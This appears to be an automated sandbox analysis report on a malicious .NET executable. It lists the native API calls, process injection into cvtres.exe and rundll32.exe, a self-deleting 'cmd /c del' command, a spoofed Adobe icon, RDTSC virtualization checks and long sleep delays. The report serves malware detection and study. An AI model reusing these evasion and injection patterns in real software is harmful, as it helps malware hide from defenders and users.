          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0481B23611_2_0481B236
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0482138B11_2_0482138B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0482EBB011_2_0482EBB0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048B03DA11_2_048B03DA
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048BDBD211_2_048BDBD2
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0482ABD811_2_0482ABD8
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048A23E311_2_048A23E3
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0481A30911_2_0481A309
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048C2B2811_2_048C2B28
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0481AB4011_2_0481AB40
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0489CB4F11_2_0489CB4F
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0087C95011_2_0087C950
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00868C6B11_2_00868C6B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00868C7011_2_00868C70
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00862D9011_2_00862D90
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0087BE4211_2_0087BE42
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0087C66C11_2_0087C66C
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0087CFB511_2_0087CFB5
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00862FB011_2_00862FB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: String function: 055AB150 appears 136 times
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 047FB150 appears 136 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_004185D0 NtCreateFile,3_2_004185D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_00418680 NtReadFile,3_2_00418680
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_00418700 NtClose,3_2_00418700
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_004187B0 NtAllocateVirtualMemory,3_2_004187B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_004185CA NtCreateFile,3_2_004185CA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_0041867A NtReadFile,3_2_0041867A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_004186CB NtReadFile,3_2_004186CB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_004187AA NtAllocateVirtualMemory,3_2_004187AA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055E9540 NtReadFile,LdrInitializeThunk,3_2_055E9540
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055E95D0 NtClose,LdrInitializeThunk,3_2_055E95D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055E9710 NtQueryInformationToken,LdrInitializeThunk,3_2_055E9710
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055E9FE0 NtCreateMutant,LdrInitializeThunk,3_2_055E9FE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055E9780 NtMapViewOfSection,LdrInitializeThunk,3_2_055E9780
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055E97A0 NtUnmapViewOfSection,LdrInitializeThunk,3_2_055E97A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055E9660 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_055E9660
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055E96E0 NtFreeVirtualMemory,LdrInitializeThunk,3_2_055E96E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055E9910 NtAdjustPrivilegesToken,LdrInitializeThunk,3_2_055E9910
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055E99A0 NtCreateSection,LdrInitializeThunk,3_2_055E99A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055E9840 NtDelayExecution,LdrInitializeThunk,3_2_055E9840
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055E9860 NtQuerySystemInformation,LdrInitializeThunk,3_2_055E9860
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055E98F0 NtReadVirtualMemory,LdrInitializeThunk,3_2_055E98F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055E9A50 NtCreateFile,LdrInitializeThunk,3_2_055E9A50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055E9A00 NtProtectVirtualMemory,LdrInitializeThunk,3_2_055E9A00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055E9A20 NtResumeThread,LdrInitializeThunk,3_2_055E9A20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055E9560 NtWriteFile,3_2_055E9560
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055EAD30 NtSetContextThread,3_2_055EAD30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055E9520 NtWaitForSingleObject,3_2_055E9520
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055E95F0 NtQueryInformationFile,3_2_055E95F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055E9770 NtSetInformationFile,3_2_055E9770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055EA770 NtOpenThread,3_2_055EA770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055E9760 NtOpenProcess,3_2_055E9760
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055EA710 NtOpenProcessToken,3_2_055EA710
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055E9730 NtQueryVirtualMemory,3_2_055E9730
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055E9650 NtQueryValueKey,3_2_055E9650
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055E9670 NtQueryInformationProcess,3_2_055E9670
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055E9610 NtEnumerateValueKey,3_2_055E9610
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055E96D0 NtCreateKey,3_2_055E96D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055E9950 NtQueueApcThread,3_2_055E9950
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055E99D0 NtCreateProcessEx,3_2_055E99D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055EB040 NtSuspendThread,3_2_055EB040
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055E9820 NtEnumerateKey,3_2_055E9820
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055E98A0 NtWriteVirtualMemory,3_2_055E98A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055E9B00 NtSetValueKey,3_2_055E9B00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055EA3B0 NtGetContextThread,3_2_055EA3B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055E9A10 NtQuerySection,3_2_055E9A10
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055E9A80 NtOpenDirectoryObject,3_2_055E9A80
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048395D0 NtClose,LdrInitializeThunk,11_2_048395D0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04839540 NtReadFile,LdrInitializeThunk,11_2_04839540
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048396D0 NtCreateKey,LdrInitializeThunk,11_2_048396D0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048396E0 NtFreeVirtualMemory,LdrInitializeThunk,11_2_048396E0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04839650 NtQueryValueKey,LdrInitializeThunk,11_2_04839650
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04839660 NtAllocateVirtualMemory,LdrInitializeThunk,11_2_04839660
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04839780 NtMapViewOfSection,LdrInitializeThunk,11_2_04839780
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04839FE0 NtCreateMutant,LdrInitializeThunk,11_2_04839FE0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04839710 NtQueryInformationToken,LdrInitializeThunk,11_2_04839710
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04839840 NtDelayExecution,LdrInitializeThunk,11_2_04839840
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04839860 NtQuerySystemInformation,LdrInitializeThunk,11_2_04839860
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048399A0 NtCreateSection,LdrInitializeThunk,11_2_048399A0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04839910 NtAdjustPrivilegesToken,LdrInitializeThunk,11_2_04839910
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04839A50 NtCreateFile,LdrInitializeThunk,11_2_04839A50
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048395F0 NtQueryInformationFile,11_2_048395F0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04839520 NtWaitForSingleObject,11_2_04839520
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0483AD30 NtSetContextThread,11_2_0483AD30
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04839560 NtWriteFile,11_2_04839560
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04839610 NtEnumerateValueKey,11_2_04839610
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04839670 NtQueryInformationProcess,11_2_04839670
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048397A0 NtUnmapViewOfSection,11_2_048397A0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0483A710 NtOpenProcessToken,11_2_0483A710
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04839730 NtQueryVirtualMemory,11_2_04839730
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04839760 NtOpenProcess,11_2_04839760
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0483A770 NtOpenThread,11_2_0483A770
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04839770 NtSetInformationFile,11_2_04839770
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048398A0 NtWriteVirtualMemory,11_2_048398A0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048398F0 NtReadVirtualMemory,11_2_048398F0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04839820 NtEnumerateKey,11_2_04839820
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0483B040 NtSuspendThread,11_2_0483B040
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_048399D0 NtCreateProcessEx,11_2_048399D0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04839950 NtQueueApcThread,11_2_04839950
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04839A80 NtOpenDirectoryObject,11_2_04839A80
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04839A00 NtProtectVirtualMemory,11_2_04839A00
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04839A10 NtQuerySection,11_2_04839A10
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04839A20 NtResumeThread,11_2_04839A20
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0483A3B0 NtGetContextThread,11_2_0483A3B0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04839B00 NtSetValueKey,11_2_04839B00
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_008785D0 NtCreateFile,11_2_008785D0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00878680 NtReadFile,11_2_00878680
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_008787B0 NtAllocateVirtualMemory,11_2_008787B0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00878700 NtClose,11_2_00878700
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_008785CA NtCreateFile,11_2_008785CA
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_008786CB NtReadFile,11_2_008786CB
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0087867A NtReadFile,11_2_0087867A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_008787AA NtAllocateVirtualMemory,11_2_008787AA
          Source: gZU26RjMUU.exe, 00000000.00000002.433618817.0000000002B19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameResourceAssembly.dllD vs gZU26RjMUU.exe
          Source: gZU26RjMUU.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: gZU26RjMUU.exeStatic PE information: invalid certificate
          Source: gZU26RjMUU.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: gZU26RjMUU.exeVirustotal: Detection: 61%
          Source: gZU26RjMUU.exeMetadefender: Detection: 22%
          Source: gZU26RjMUU.exeReversingLabs: Detection: 76%
          Source: gZU26RjMUU.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\gZU26RjMUU.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\gZU26RjMUU.exe "C:\Users\user\Desktop\gZU26RjMUU.exe"
          Source: C:\Users\user\Desktop\gZU26RjMUU.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\gZU26RjMUU.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"Jump to behavior
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{317D06E8-5F24-433D-BDF7-79CE68D8ABC2}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\gZU26RjMUU.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\gZU26RjMUU.exe.logJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@23/12
          Source: gZU26RjMUU.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
          Source: C:\Users\user\Desktop\gZU26RjMUU.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2816:120:WilError_01
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\gZU26RjMUU.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: gZU26RjMUU.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: gZU26RjMUU.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
          Source: gZU26RjMUU.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: HJGFHFHJJKKGJ.pdb source: gZU26RjMUU.exe
          Source: Binary string: HJGFHFHJJKKGJ.pdbBSJB source: gZU26RjMUU.exe
          Source: Binary string: wntdll.pdbUGP source: cvtres.exe, 00000003.00000002.506066214.000000000569F000.00000040.00000800.00020000.00000000.sdmp, cvtres.exe, 00000003.00000003.432775420.00000000053E7000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 00000003.00000003.430645116.0000000005247000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.505885590.00000000044A2000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.948675558.00000000047D0000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.948834745.00000000048EF000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.507623325.0000000004639000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: cvtres_clr.pdb source: rundll32.exe, 0000000B.00000002.949137822.0000000004D07000.00000004.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: cvtres.exe, cvtres.exe, 00000003.00000002.506066214.000000000569F000.00000040.00000800.00020000.00000000.sdmp, cvtres.exe, 00000003.00000003.432775420.00000000053E7000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 00000003.00000003.430645116.0000000005247000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, rundll32.exe, 0000000B.00000003.505885590.00000000044A2000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.948675558.00000000047D0000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.948834745.00000000048EF000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.507623325.0000000004639000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: rundll32.pdb source: cvtres.exe, 00000003.00000002.506971332.0000000007470000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: rundll32.pdbGCTL source: cvtres.exe, 00000003.00000002.506971332.0000000007470000.00000040.10000000.00040000.00000000.sdmp
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_0041B87C push eax; ret 3_2_0041B882
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_0041B812 push eax; ret 3_2_0041B818
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_0041B81B push eax; ret 3_2_0041B882
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_0040D155 push ecx; ret 3_2_0040D156
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_00418A7B push ss; ret 3_2_00418A7F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_00416232 push 00000005h; retf 3_2_00416234
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_0041BCD2 push esp; ret 3_2_0041BE41
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_00418CD8 push edx; ret 3_2_00418CD9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_00415588 push esi; retf 3_2_0041558A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_00415F51 push CA8369B7h; retf 3_2_00415F56
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_0041B7C5 push eax; ret 3_2_0041B818
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_055FD0D1 push ecx; ret 3_2_055FD0E4
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0484D0D1 push ecx; ret 11_2_0484D0E4
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0087B812 push eax; ret 11_2_0087B818
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0087B81B push eax; ret 11_2_0087B882
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0087B87C push eax; ret 11_2_0087B882
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0086D155 push ecx; ret 11_2_0086D156
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00878A7B push ss; ret 11_2_00878A7F
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0087BCD3 push esp; ret 11_2_0087BE41
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00878CD8 push edx; ret 11_2_00878CD9
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00875588 push esi; retf 11_2_0087558A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0087B7C5 push eax; ret 11_2_0087B818
          Source: gZU26RjMUU.exeStatic PE information: real checksum: 0x5691d should be: 0x568f6
          Source: initial sampleStatic PE information: section name: .text entropy: 7.926371695

          Hooking and other Techniques for Hiding and Protection

          barindex
          Icon mismatch, binary includes an icon from a different legit application in order to fool users
          Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: adobe 12.png
          Source: C:\Windows\explorer.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
          Source: C:\Users\user\Desktop\gZU26RjMUU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\gZU26RjMUU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\gZU26RjMUU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\gZU26RjMUU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\gZU26RjMUU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\gZU26RjMUU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\gZU26RjMUU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\gZU26RjMUU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\gZU26RjMUU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\gZU26RjMUU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\gZU26RjMUU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeRDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeRDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 0000000000868604 second address: 000000000086860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 000000000086898E second address: 0000000000868994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\gZU26RjMUU.exe TID: 4348Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 4420Thread sleep time: -90000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_004088C0 rdtsc 3_2_004088C0
          Source: C:\Users\user\Desktop\gZU26RjMUU.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeAPI coverage: 6.4 %
          Source: C:\Windows\SysWOW64\rundll32.exeAPI coverage: 7.6 %
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\gZU26RjMUU.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: explorer.exe, 00000004.00000000.444641746.000000000807B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.484828222.0000000007EF6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
